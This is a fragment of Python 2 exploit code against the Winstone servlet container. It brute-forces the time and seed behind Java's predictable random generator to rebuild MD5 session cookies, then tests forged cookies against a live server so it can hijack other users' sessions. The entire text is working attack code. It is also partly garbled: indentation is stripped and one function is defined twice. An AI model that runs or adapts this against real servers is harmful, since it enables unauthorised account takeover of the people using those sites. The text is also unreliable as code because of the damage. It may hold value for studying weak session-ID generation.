def hijackSession(url,IPAddr,serverPort,sessionsFileName,success_str):
f = open(sessionsFileName,"r")
while True:
line = f.readline().replace("\n","")
if line == "":
break
(cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt) = line.split(",")
timeMillisMin = int(timeMillisMin)
timeMillisMax = int(timeMillisMax)
PRNGseed = int(PRNGseed)
sessionCnt = int(sessionCnt)
seek = 1
for tryMillis in range(timeMillisMin,timeMillisMax):
if seek > sessionCnt:
break
g = JavaLCGMimic(0)
g.forceSeed(PRNGseed)
for i in range(seek):
PRNGout = g.nextLong()
md5dig = hashlib.md5()
md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(tryMillis)+str(PRNGout))
cookieToTry = md5dig.hexdigest()
if isCookieValid(url,cookieName+"="+cookieToTry,success_str):
print "[!!!] Found valid cookie:",cookieName+"="+cookieToTry
seek += 1
def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue):
global PRNGseekMax
global timeMillisDelay
while True:
if seedValue.value != 0:
return 0
(PRNGMillisMin,PRNGMillisMax,PRNGseek) = workQueue.get(block=False)
workQueue.put((PRNGMillisMin,PRNGMillisMax,PRNGseek+1))
if PRNGseek > PRNGseekMax:
return -1
for PRNGMillis in range(PRNGMillisMin,PRNGMillisMax):
#if seedValue.value != 0:
#return 0
g = JavaLCGMimic(PRNGMillis)
PRNGout = -1
for s in range(PRNGseek):
PRNGout = g.nextLong()
for timeMillis in range(timeMillisEstimate-timeMillisDelay,timeMillisEstimate+1000):
md5dig = hashlib.md5()
md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
if md5dig.hexdigest() == cookie:
seedValue.value = g.seed
return 0
def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue):
global PRNGseekMax
global timeMillisDelay
while True:
if seedValue.value != 0:
return 0
(PRNGMillisMin,PRNGMillisMax,PRNGseek) = (None,None,None)
try:
(PRNGMillisMin,PRNGMillisMax,PRNGseek) = workQueue.get(timeout=1)
except TQ.Empty:
print "[!] Queue is EMPTY"
return
if PRNGMillisMin == None:
print "[!] Cannot read from queue"
return
workQueue.put((PRNGMillisMin,PRNGMillisMax,PRNGseek+1))
if PRNGseek > PRNGseekMax:
return
for PRNGMillis in range(PRNGMillisMin,PRNGMillisMax):
g = JavaLCGMimic(PRNGMillis)
PRNGout = -1
for s in range(PRNGseek):
PRNGout = g.nextLong()
for timeMillis in range(timeMillisEstimate-timeMillisDelay,timeMillisEstimate+1000):
md5dig = hashlib.md5()
md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
if md5dig.hexdigest() == cookie:
print "[*] Found PRNGMillis =",PRNGMillis
print "[*] Found timeMillis =",timeMillis
seedValue.value = g.seed
return 0
def syncMillisAndPRNG(url,PRNGseed,IPAddr,serverPort,timezone):
global CookieName
global PRNGseekMax
global timeMillisDelay
t = givemecookie(url)
if t == None:
return
cookie = t[0].split('=')[-1]
st = time.strptime(t[-1], '%a, %d %b %Y %H:%M:%S %Z')
dt = datetime.fromtimestamp(time.mktime(st))
dt = dt.replace(tzinfo=pytz.utc).astimezone(pytz.timezone(timezone))
timeSecs = int(time.mktime(dt.timetuple()))
PRNGseek = 1
while True:
if PRNGseek > PRNGseekMax:
break
g = JavaLCGMimic(0)
g.forceSeed(PRNGseed)
PRNGout = -1
for s in range(PRNGseek):
PRNGout = g.nextLong()
for timeMillis in range((timeSecs*1000)-timeMillisDelay,(timeSecs*1000)+1000):
md5dig = hashlib.md5()
md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
if md5dig.hexdigest() == cookie:
print "[.] Parameters found:","timeMillis =",timeMillis,"Seek =",PRNGseek
return (timeMillis,g.seed,PRNGseek)
PRNGseek += 1
